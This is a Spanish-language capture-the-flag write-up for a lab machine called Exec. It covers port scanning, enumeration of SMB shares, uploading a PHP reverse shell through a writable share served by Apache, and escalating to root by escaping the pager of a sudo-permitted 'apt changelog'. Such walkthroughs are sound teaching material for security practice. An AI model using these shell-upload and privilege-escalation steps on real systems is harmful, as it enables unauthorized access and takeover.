Exec

🔍 Dificultad: Muy Fácil

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 192.168.1.74

para verificar la conectividad de red.

A continuación, se realiza el comando:

nmap -p- --open 192.168.1.74 --min-rate 5000 -n

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo, el puerto 22 perteneciente al servicio SSH, el puerto 80 perteneciente al servicio HTTP, el puerto 139 y el puerto 445, ambos pertenecientes al servicio SMB (Server Message Block), están abiertos, por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80,139,445 -v 192.168.1.74

para obtener más información sobre ese puerto específicamente.

Revisamos el puerto 80. Como podemos ver es la página de por defecto de Apache.

Revisamos directorios.

gobuster dir -u http://192.168.1.74 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x html,txt,php,xml

No encontramos nada por lo que revisamos el servicio SAMBA al listar los directorios compartidos.

smbclient -N -L 192.168.1.74

Vemos que permisos tenemos.

smbmap -H 192.168.1.74

Tenemos permisos de escritura y lectura en el directorio compartido /server.

smbclient //192.168.1.74/server

🚀 EXPLOTACIÓN

Voy a intentar subir una Reverse Shell ya que parece ser que corresponden a las páginas del puerto 80.

put revshell.php

Hacemos el tratamiento de la TTY para trabajar más cómodos.

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

sudo -u s3cur4 /usr/bin/bash
sudo -u root /usr/bin/apt changelog apt
!/bin/bash

Ya somos root.

Last updated

Was this helpful?